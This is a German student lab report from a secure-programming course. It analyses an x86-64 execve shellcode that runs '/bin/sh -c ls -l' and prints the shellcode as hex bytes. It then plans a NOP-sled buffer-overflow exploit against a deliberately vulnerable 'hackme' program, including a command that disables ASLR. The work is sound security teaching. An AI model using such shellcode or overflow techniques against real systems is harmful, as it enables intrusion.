Sichere Programmierung Projekt 3

David Pierre Sugar (76050) Julian Sobott (76511)

1 Einleitung

Nachdem wir uns während des letzten Praktikums grundlegend mit Assembler und dem GDB auseinander gesetzt haben, wird es nun Zeit diese neu gewonnenen Fähigkeiten zu nutzen um einen größeren Assembler-Code-Block zu analysieren.

Wie auch im letzten Praktikum greifen wir dabei auf die **GEF** Erweiterung für GDB zu.

2 Ein interessanter Shellcode

Auf den ersten Blick scheint der hier vorliegende Shellcode wirklich interessant. Beim überfliegen der Codezeilen fällt dabei auf, dass mittels PUSH und POP Operationen überdurchschnittlich oft der Stack verändert wird. Auch werden in einigen Zeilen bisher noch nicht zuordnungsbare Konstanten auf den Stack gepushed. Am Schluss wird jedoch ein Systemcall ausgeführt was dafür spricht, dass die für den Systemcall nötigen Daten auf dem Stack vorbereitet werden.

Da sich der Ablauf jedoch nicht so ohne weiteres ablesen lässt, wird im ersten Schritt der Shellcode Zeile für Zeile analysiert.

2.1 Analyse

Bei der Analyse von Assembler Code sollte man sich als erstes bewusst machen, welche Register involviert sind und wie der zugehörige Stack Frame ausgelegt ist. Dafür beginnt man in der ersten Zeile, analysiert diese und hält mögliche Veränderungen von Registern und Stack fest. Diesen Schritt wiederholt man Schritt für Schritt in jeder Code Zeile. Dabei sollte man dem Programmfluss folgen, d.h. bei einem Branch fährt man, mit der Analyse, beim angegebenen Sprungziel fort.

Das folgende Diagramm zeigt die vollständige Analyse des Shellcodes. Dabei werden teilweise mehrere Instruktionen in einem Schritt behandelt, wenn diese logisch zusammenhängen.

```
Vorbedingung:
 STACK:
 ----- <- RSP
 REGISTER: -
 9
 Code:
10
 xor rcx, rcx
 push
     rcx
12
13
 STACK:
14
15
       0x0
16
 ----- <- RSP
17
 REGISTER: RCX = 0x0
19
20
 21
22
 Code:
 mov rcx, 0x68732f6e69622fff
^{24}
25
 STACK:
26
 -----
27
       0x0
28
 ----- <- RSP
 REGISTER: RCX = 0x68732f6e69622fff
31
32
 33
34
 Code:
 shr rcx, 0x8 ; rcx >> 8
36
37
 STACK:
38
 _____
39
        0x0
 ----- <- RSP
41
42
 REGISTER: RCX = 0x0068732f6e69622f
43
44
45
 46
47
 Code:
48
 push rcx
```

```
50
 STACK:
51
52
          0x0
53
54
   0x0068732f6e69622f
57
 REGISTER: RCX = 0x0068732f6e69622f
58
59
 61
 Code:
62
 push rsp
63
64
 STACK:
65
66
         0x0
67
68
   0x0068732f6e69622f
69
70
71
  ----- <- RSP
73
 REGISTER: RCX = 0x0068732f6e69622f
74
75
 76
77
 Code:
78
 pop rdi
79
80
 STACK:
81
82
       0x0
83
   0x0068732f6e69622f
85
   ----- <- A/ RSP
86
87
 REGISTER: RCX = 0x0068732f6e69622f
88
          RDI = A
89
91
 92
93
 Code:
94
 xor rcx, rcx
 push
      rcx
96
97
 STACK:
98
```

```
0x0
100
101
   0x0068732f6e69622f
102
103
         0x0
104
  ----- <- RSP
105
106
  REGISTER: RCX = 0x0
107
         RDI = A
108
109
  111
  Code:
112
  push word 0x632d
113
114
  STACK:
        0x0
117
118
   0x0068732f6e69622f
119
  ----- <- A
120
         0x0
122
                          2-Bytes
    0x632d
123
  ----- <- RSP
124
125
  REGISTER: RCX = 0x0
126
         RDI = A
128
  129
130
  Code:
131
  push rsp
132
  STACK:
134
135
         0x0
136
137
  0x0068732f6e69622f
  ----- <- A
         0x0
140
  _____
141
     0x632d
                          2-Bytes
142
143
      В
144
  ----- <- RSP
REGISTER: RCX = 0x0
```

```
RDI = A
148
149
  150
151
  Code:
152
  pop rbx
153
154
  STACK:
155
156
        0x0
157
  0x0068732f6e69622f
159
  ----- <- A
160
         0x0
161
  -----
162
    0x632d
                       2-Bytes
163
  ----- <- B/ RSP
164
165
  REGISTER: RCX = 0x0
166
        RDI = A
167
         RBX = B
168
169
  171
 Code:
172
  xor rcx, rcx
173
 push
      rcx
174
175
  STACK:
177
         0x0
178
  _____
179
   0x0068732f6e69622f
180
  ----- <- A
181
         0x0
183
                        2-Bytes
        0x632d
                  184
  ----- <- B
185
        0x0
186
  ----- <- RSP
187
  REGISTER: RCX = 0x0
189
         RDI = A
190
         RBX = B
191
192
  194
195
196 Code:
```

```
jmp command
197
       execve
  call
198
  data: db "ls -lA" ; Die Adresse des Strings wird
199
                   ; wird als Rücksprungadresse auf den Stack
200
                   ; gepushed
201
  STACK:
202
203
         0x0
204
   -----
205
   0x0068732f6e69622f
206
  ----- <- A
207
          0x0
208
209
      0x632d
                            2-Bytes
210
  ----- <- B
211
          0x0
212
213
           x-----> "ls -lA"
214
  ----- <- RSP
215
216
  REGISTER: RCX = 0x0
217
          RDI = A
218
          RBX = B
220
  221
222
  Code:
223
  pop rdx
push rdx
224
225
226
  STACK:
227
228
         0x0
229
  ______
230
  0x0068732f6e69622f
  ----- <- A
232
          0x0
233
  -----
234
                            2-Bytes
      0x632d
235
  ----- <- B
          0x0
237
238
           x-----> "ls -lA"
239
  ----- <- RSP
240
241
  REGISTER: RCX = 0x0
242
          RDI = A
243
          RBX = B
244
          RDX = PTR to "ls -lA"
245
```

```
246
  247
248
  Code:
249
  xor byte [rdx+5], 0x41; ersetze A durch (ASCII 0x41 = 'A')
250
251
  STACK:
252
253
          0x0
254
  _____
255
   0x0068732f6e69622f
256
257
          0x0
258
259
                          2-Bytes
    0x632d
260
  ----- <- B
261
          0x0
262
263
          x-----> "ls -1\0"
264
     ----- <- RSP
265
266
  REGISTER: RCX = 0x0
267
          RDI = A
268
          RBX = B
269
          RDX = PTR to "ls -1 \0"
270
271
  272
273
  Code:
274
  push rbx
275
276
  STACK:
277
278
         0x0
279
   0x0068732f6e69622f
281
  ----- <- A
282
          0x0
283
  _____
284
    0x632d
                          2-Bytes
285
  ----- <- B
          0x0
287
   ______
288
          x-----> "ls -1\0"
289
290
291
          В
   ----- <- RSP
292
293
  REGISTER: RCX = 0x0
294
```

```
RDI = A
295
            RBX = B
296
            RDX = PTR to "ls -1 \0"
297
298
299
  300
301
  Code:
302
  push rdi
303
304
  STACK:
305
306
           0x0
307
308
    0x0068732f6e69622f
309
310
            0x0
311
312
          0x632d
                                2-Bytes
313
314
            0x0
315
316
            x-----> "ls -1\0"
318
            В
319
320
            Α
321
  ----- <- RSP
322
323
  REGISTER: RCX = 0x0
324
            RDI = A
325
            RBX = B
326
            RDX = PTR to "ls -1\0"
327
328
  329
330
  Code:
331
  push rsp
332
333
  STACK:
334
            0x0
336
337
    0x0068732f6e69622f
338
339
340
            0x0
341
          0x632d
                                2-Bytes
342
  ----- <- B
343
```

```
0x0
344
345
           x-----> "ls -1\0"
346
347
           В
348
349
           Α
350
351
           С
352
  ----- <- RSP
353
354
          RCX = 0x0
  REGISTER:
355
          RDI = A
356
           RBX = B
357
           RDX = PTR to "ls -1\0"
358
359
  360
361
  Code:
362
  pop rsi
363
364
  STACK:
365
366
         0x0
367
368
    0x0068732f6e69622f
369
370
371
          0x0
  _____
372
                            2-Bytes
     0x632d
373
   ----- <- B
374
          0x0
375
   -----
376
           x-----> "ls -1\0"
377
           R
379
380
           Α
381
  ----- <- C/ RSP
382
383
  REGISTER:
          RCX = 0x0
384
           RDI = A
385
           RBX = B
386
           RDX = PTR to "ls -1 \0"
387
           RSI = C
388
389
  390
391
392 Code:
```

```
xor rdx, rdx
  mov al, 0x3B
394
395
  STACK:
396
397
      0x0
398
399
  0x0068732f6e69622f
400
  ----- <- A
401
        0x0
402
403
          0x632d
                              2-Bytes
404
  ----- <- B
405
           0x0
406
407
            x-----> "ls -1\0"
408
409
           В
410
411
      A
412
    ----- <- C/ RSP
413
414
  REGISTER: RCX = 0x0
415
           RDI = A
416
           RBX = B
417
           RDX = 0x0
418
           RSI = C
419
           RAX = 0x00000000000003B
420
421
422
  423
424
                     SYSCALL
425
  Code:
```

Zum Zeitpunk des Systemcalls liegt folgender Zustand vor.

```
STACK:
             0x0
      0x0068732f6e69622f
             0x0
                      | <-----
            0x632d
             0x0
11
12
             x-----> "ls -1\0" |
13
14
15
17
18
19
  REGISTER:
             RCX = 0x0
20
             RDI = A
21
             RBX = B
22
             RDX = 0x0
23
             RSI = C
24
             RAX = 0x00000000000003B
25
```

Als nächstes gilt es zu klären, welcher Systemcall aufgerufen wird und welche Argumente dabei übergeben werden. Dazu muss man sich jedoch über die Systemcall Calling Convention, für x86-64Bit, im klaren sein.

2.1.1 Systemcalls

Der Linux Kernel stellt eine Reihe von Operationen bereit, die er stellvertretend für andere Prozesse ausführen kann. Dazu zählen u.a. Operationen zum allozieren von Speicher auf dem Heap oder auch Zugriffe auf Dateien. Die Schnittstelle bildet dabei die syscall Instruktion für neuere 64-Bit Systeme, bzw. die **0x80** Instruktion für ältere 32-Bit Systeme.

Calling Convention

Die Operation, die der Kernel für einen Prozess ausführen soll wird durch die sog. **Syscall Number** spezifiziert, die in das RAX Register geschrieben wird. So wird ein READ Befehl z.B. durch die Nummer **0x0** angegeben.

Die Argumente für jeden Systemcall werden **mittels Register** übergeben. Für 64 Bit

Programme wären dies, in der angegebenen Reihenfolge: RDI, RSI, RDX, RCX, R10, R8, R9.

Nachdem die jeweilige Syscall Number in das RAX Register geschrieben wurde und die Argumente ebenfalls in die entsprechenden Register, kann mit dem syscall Befehl eine Anfrage abgesetzt werden.

Ablauf

Durch die syscall Instruktion wechselt der Prozessor vom User Mode in den Kernel Mode und ruft den Trap Handler auf. Dieser überprüft ob es sich bei dem in RAX hinterlegten Wert um eine valide Syscall Number handelt und ob zulässige Argumente übergeben wurden. Falls ja indiziert der Trap Handler die Sycall Tabelle um die Adresse der zur Syscall Number gehörenden Systemcall Service Routine zu erhalten und springt zu dieser.

Die Systemcall Service Routine führt dann die gewünschte Aktion aus. $AUSF\ddot{U}HRLICHER$

Eine vollständige Liste aller Systemcalls und der zu übergebenden Argumente findet sich online, z.B. hier.

2.2 Analyse Fortsetzung

Da die Syscall Number immer über das **A-Register** angegeben wird, ist es nun eine Leichtigkeit herauszufinden, welcher Syscall im gegebenen Shellcode verwendet wird. Der Wert der zur Zeit des Syscalls in RAX steht ist **59**. Durch eine kurze Onlinerecherche ergibt sich damit, dass es sich hierbei um den **execve** Syscall handelt. Dieser hat folgende Struktur.

```
execve(const char* filename, const char* const argv[],
const char* const envp[])
```

2.2.1 Exec

Die Familie der **exec** System Calls wir dazu genutzt den derzeit laufenden Prozess durch einen neuen Prozess zu ersetzen (siehe man execve). Die einzelnen Parameter haben dabei folgende Bedeutungen.

filename Nullterminierter String $(' \setminus 0')$ des Programms, mit dem der derzeitige Prozess ersetzt werden soll.

argv Mit '(char*) NULL' terminiertes Array von Kommandozeilen Parametern als Strings.

envp Mit '(char*) NULL' terminiertes Array von Environment-Variablen als Strings.

Bei Erfolg wird der derzeitige Prozess durch das in filename angegebene Programm ersetzt. Bei einem fehlerhaften Aufruf von execve, wird -1 zurückgegeben.

Um den derzeitigen Prozess z.B. durch eine Shell zu ersetzen, kann folgender Aufruf verwendet werden.

```
execve("/bin/sh\0", NULL, NULL)
```

Hier wurde auf die Übergabe von Argumenten an den neuen Prozess verzichtet.

Schaut man sich nun das Layout des Stacks unmittelbar vor dem Aufruf von syscall an, kann man diesen in drei Teilbereiche gliedern, die jeweils für filename, argv und envp stehen. Weiterhin können die bisher noch nicht zuordnungsbaren Hexadezimalzahlen als Strings interpretiert werden. Dabei ist daran zu denken, dass Werte grundsätzlich im Little-Endian Format abgespeichert werden, d.h. das niederwertigste Byte wird an die unterste Speicheradresse geschrieben.

```
STACK:
  _____
        0x0
 -----
    "/bin/sh" | ----- filename
  ----- <- A / argv[0]
         0x0
  ______
         " - c "
  ----- <- B / argv[1]
         0x0
11
12
          x-----> "ls -1\0"
13
  _____
14
         В
15
  -----|
          Α
   ----- <- C
18
19
         RDI = A
                  (filename)
 REGISTER:
20
         RSI = C
                  (argv)
21
         RDX = 0x0
                  (envp)
22
23
 STRINGS:
24
          00x0
              68
                73 2f
                      6e
                         69
                           62
                               2f
                                  = "/bin/sh"
25
           1_| |_| |_| |_| |_| |_| |_| |_|
26
              \0
              h
                 S
                    /
                      n
                         i
                               /
28
29
          0x63 2d
30
           1_1 1_1
31
            32
```

Die untersten 32 Bit des Stacks bilden das argv Array. Jeder 8 Bit Block hält dabei einen Zeiger auf einen nullterminierten String. Darüber liegen die Strings, die in argv verwendet werden. $\operatorname{argv}[0]/A$ spezifiziert dabei das aufzurufende Programm, $\operatorname{argv}[1]/B$ ist die zu verwendende kommandozeilenoption, "-c", die übergeben werden soll. Die gegebene Option sorgt dafür, dass der nach den Optionen folgende String von der Shell ausgeführt wird. $\operatorname{argv}[2]/x$ ist das in der Shell auszuführende Programm.

Mit diesen Informationen ergibt sich folgender Systemcall.

```
char* argv[] = {"/bin/sh", "-c", "ls -l"};
execve("/bin/sh", argv, (char*) NULL);
```

Dieser ersetzt den derzeitigen Prozess mit einer neuen Shell und führt in dieser das Programm 1s -1 aus.

2.3 Implementierung

Um den Shellcode zu implementieren, wird dieser in eine Datei mit der Endung .asm übertragen, in diesem Fall exec.asm.

Mit nasm -f elf64 exec.asm kann danach eine 64-Bit Object Datei erzeugt werden.

Mit 1d -N exec.o -o exec kann diese dann zu einer ausführbaren Datei gelinkt werden, um sie danach auszuführen. Wichtig ist, dass die -N Option mit angegeben wird, da die Text Section standardmäßig nicht schreibbar ist, wodurch jeder solche Versuch zu einem Segmentation fault führt.

Listing 1: Ohne -N Option

```
1 >> nasm -f elf64 exec.asm
2 >> ld exec.o -o exec
3 >> ./exec
4 [1] 2822 segmentation fault (core dumped) ./exec
```

Listing 2: Mit -N Option

```
1 >> nasm -f elf64 exec.asm
2 >> ld -N exec.o -o exec
3 >> ./exec
4 total 12
5 -rwxr-xr-x 1 sugar sugar 848 Dec 25 14:21 exec
6 -rw-r--r- 1 sugar sugar 754 Dec 25 14:11 exec.asm
7 -rw-r--r- 1 sugar sugar 736 Dec 25 14:12 exec.o
```

2.4 Entwicklung eins Python-Skript

Um ein Skript zu entwickeln, dass den Shellcode über das Programm **hackme** ausführt, muss als erstes der Code aus der Object (.o) Datei extrahiert werden. Dazu kann das Programm **objcopy** verwendet werden.

```
objcopy -O binary exec.o exec.bin
```

Die -O binary Option generiert einen Speicher Dump des Inhalts der Quelldatei ohne dabei die Metainformationen zu übernehmen. Nun muss der extrahierte Binärcode noch in Hexadezimal umformatiert werden, um ihn bequem in einem Skript nutzen zu können. Dies kann mit einem eigenen Python Skript realisiert werden, das als Ausgangspunkt für das eigentliche Skript dient.

```
#!/bin/python2
2
  import sys
3
  shellcode
  shellcode_length
                        = 0
  binary = open(sys.argv[1], 'rb')
8
  for byte in binary.read():
10
       shellcode = shellcode + ("\x" + byte.encode("hex"))
11
       shellcode_length += 1
12
13
  print(shellcode)
14
  print("\nLength: " + str(shellcode_length))
```

Das Skript liest eine übergebene Binärdatei ein und wandelt der Reihe nach jedes Byte in seine Hexadizimalrepräsentation um. Gleichzeitig wird die Anzahl der Bytes, d.h. die Länge des Shellcodes ermittelt. Wichtig ist, dass Python2 verwendet wird da unter Python3 für Bytes die **encode()** methode nicht mehr zur Verfügung steht. Mit diesem Skript lässt sich nun der extrahierte Binärcode in Hexadezimal umwandeln und auf der Kommandozeile ausgeben.

```
1 >> ./exec_shellcode.py exec.bin
2 \x48\x31\xc9\x51\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73
3 \x68\x48\xc1\xe9\x08\x51\x54\x5f\x48\x31\xc9\x51\x66
4 \x68\x2d\x63\x54\x5b\x48\x31\xc9\x51\xeb\x11\x5a\x52
5 \x80\x72\x05\x41\x53\x57\x54\x5e\x48\x31\xd2\xb0\x3b
6 \x0f\x05\xe8\xea\xff\xff\xff\x6c\x73\x20\x2d\x6c\x41
7
8 Length: 65
```

Als nächstes gilt es den Shellcode noch mit einem **NOP Sled** sowie einer **Rücksprung-adresse** zu versehen um die letztendliche Payload zu erhalten. Dafür muss aber zuerst noch das **hackme** Programm analysiert werden, um die Größe des Sleds richtig wählen zu können.

2.4.1 Analyse von hackme

Listing 3: hackme.c

```
#include <stdio.h>
```

```
#include <string.h>
3
   void print(char* s) {
4
       char buffer [200];
5
6
       strcpy(buffer, s);
                             // SCHWACHSTELLE
       printf("Anfang von buffer: %p\n", buffer);
       printf("Inhalt von buffer: %s\n", buffer);
9
   }
10
11
   int main(int argc , char ** argv) {
12
       if (argc == 2) {
13
           print(argv [1]);
       } else {
15
           printf("Bitte ein Argument übergeben .\n");
16
17
18
       return 0;
19
20
```

Das Programm hackme wurde mit dem Kommandozeilenbefehl

'gcc -z execstack -fno-stack-protector hackme.c -o hackme' compiliert. Durch die angegebene Option wird kein Canary Wert mit auf dem Stack hinterlegt, durch den normalerweise geprüft wird, ob eine Verletzung der Grenzen des Stack-Frames vorliegt. Außerdem wird mit -z execstack der Stack als ausführbar markiert, andernfalls könnte der Shellcode nicht ausgeführt werden und man müsste auf Alternativen wie z.B. Return Oriented Programming (ROP) ausweichen.

Das Programm wird nun mittels GDB debugged.

```
1 >> gdb hackme
```

Die Schwachstelle befindet sich in der **print()** Funktion. Diese benutzt **strcpy()** um den Inhalt eines Buffers in einen zweiten Buffer zu übertragen. Dabei wird jedoch die Größe des Ziel-Buffers nicht berücksichtigt, wodurch es zu einem Buffer-Overflow kommen kann. Genau diese Schwachstelle ist der Eintrittspunkt für unseren Shellcode.

Als nächstes wird die print() Funktion disassembliert.

```
gef > disass print
  Dump of assembler code for function print:
3
      push
             rbp
      mov
             rbp, rsp
4
             rsp,0xe0
                                       alloziert 224 Bytes auf dem Stack
      sub
                                          ; speichert s auf dem Stack
             QWORD PTR [rbp-0xd8],rdi
6
      mov
             rdx, QWORD PTR [rbp-0xd8]
      mov
      lea
             rax,[rbp-0xd0]
                                      ; rax := Adresse des Ziel Buffers
             rsi, rdx
                                       Source
      mov
9
      mov
             rdi, rax
                                      ; Target
10
             0x1030 <strcpy@plt>
11
      call
12
```

Die gezeigten Befehle allozieren zuerst Speicher für den Buffer und den Parameter s auf dem Stack. Danach wird die Startadresse des allozierten Buffers in RDI und die Adresse des Quell-Buffers in RSI geschrieben.

Damit ergibt sich folgendes Layout für den Stack-Frame.

```
STACK:
        RETURNADDRESS
                                     8 Byte
    ______
         SAVED RBP
                                     8 Byte
   ----- <- RBP
                         -
                                     8 Byte
10
          BUFFER
                                     200 Byte
11
12
13
          char* s
                                     8 Byte
15
16
                                     8 Byte
17
```

Zwischen dem Anfang des Buffers und der Rücksprungadresse liegen **216 Bytes**, d.h. durch die Übergabe eines Strings w der Länge $|\mathbf{w}| > 216$, an hackme, kann die Rücksprungadresse kontrolliert werden.

Um den Shellcode durch hackme ausführen zu können, muss nun eine geeignete Payload erstellt werden. Diese besteht aus einem NOP Sled, dem Shellcode und schlussendlich einer Adresse die in den Sled zeigt.

NOPs sind Instruktionen, die zu keiner Veränderung des Zustands einzelner Register führen (außer RIP). Früher wurden solche Instruktionen häufig eingesetzt um auf die Ergebnisse vorangegangener Instruktionen zu warten, die noch nicht vorlagen. Damit der übergebene Shellcode ausgeführt werden kann, muss der Instruction Pointer so manipuliert werden, dass er auf den Anfang des übergebenen Codes Zeigt. Dies geschieht durch das Überschreiben der Rücksprungadresse. Durch das Überschrieben der Rücksprungadresse springt der Prozess nicht zurück in die aufrufende Funktion sondern an eine von uns gewünschte Stelle. Durch einen NOP Sled muss die Sprungadresse nicht mehr exakt angegeben werden, sondern nur noch in den Sled zeigen. Sobald der Prozess in den Sled gesprungen ist, 'rutscht' er einfach bis zur ersten Instruktion des Shellcodes durch. Dies vereinfacht die Injektion des Shellcodes. Dabei gilt, je größer der Sled um so besser. Ziel

ist es nun NOP Sled und Adresse so zu wählen, dass das Programm den Shellcode ausführt.

Um die Rücksprungadresse überschreiben zu können, muss der übergebene String 216 Bytes lang sein, plus die **sechs Byte**, **die die Rücksprungadresse darstellen**. Der Shellcode selber ist 65 Bytes lang. Daraus ergibt sich, dass der NOP Sled 216-65=151 Bytes lang sein muss. Nach dem **strcpy()** aufruf sollte der Stack demnach wie folgt aussehen.

Nun gilt es noch eine **gültige Adresse** zu wählen, damit an die richtige Stelle im Stack gesprungen wird. In diesem Fall ist für Übungszwecke **ASLR** (address space layout randomization), eine zufällige Wahl der Speicheradressen, ausgeschaltet. Dies vereinfacht den Prozess der Adresswahl, da diese nur einmal ermittelt werden muss. Andernfalls müsste z.B. auf ein **Brute-Force** Ansatz zurückgegriffen werden, bei dem das Programm sooft ausgeführt wird, bis die Sprungadresse durch Zufall tatsächlich im NOP Sled liegt. Dies ist wahrscheinlicher als es sich anhört, da die ersten 12 Bit der Adresse statisch sind, was die Wahrscheinlichkeit für einen Treffer erhöht.

Es gibt dabei verschiedene Stufen von ASLR, nämlich 0 (aus), 1 und 2 (vollständig). Durch das Schreiben in die Datei '/proc/sys/kernel/randomize_va_space' kann dieser geändert werden. Um ASLR nun auf dem System temporär auszuschalten kann folgender Kommandozeilenbefehl verwendet werden, der die Zahl 0 in die genannte Datei schreibt.

```
1 >> echo 0 > /proc/sys/kernel/randomize_va_space
```

Das Programm hackme kommt einem bei der Suche nach der richtigen Sprungadresse sogar noch zuvor, indem es die Adresse der Startadresse des Buffers beim Ausführen mit angibt. Andernfalls kann man auch GDB nutzen um eine geeignete Adresse zu erhalten.

Zum Vergleich hier die Ausgabe einmal mit ASLR eingeschaltet und einmal ohne.

Listing 4: ASLR enabled

```
> cat /proc/sys/kernel/randomize_va_space
2 2
>> ./hackme hello
4 Anfang von buffer: 0x7ffdc776aec0
5 Inhalt von buffer: hello
```

```
% > ./hackme hello
Anfang von buffer: 0x7fffa0345140
Inhalt von buffer: hello
```

Listing 5: ASLR disabled

Im ersten Beispiel ist ASLR eingeschaltet, d.h. randomize_va_space enthält den Wert 2. Jeder Aufruf von hackme führt zu einer gänzlich anderen Adresse, wobei sich die vorderen 12 Bit jeweils nicht verändern.

Im zweiten Beispiel ist ASLR augeschaltet. Hier werden bei jedem Aufruf die selben Adressen verwendet.

2.4.2 Den Shellcode ausführen

Nun wird es Zeit, die Theorie in die Praxis umzusetzen und erst einmal ohne Skript den Shellcode über hackme auszuführen. Dafür wird folgender Pyhton Befehl auf der Kommandozeile ausgeführt und danach durch Command Substitution, hackme als Argument übergeben.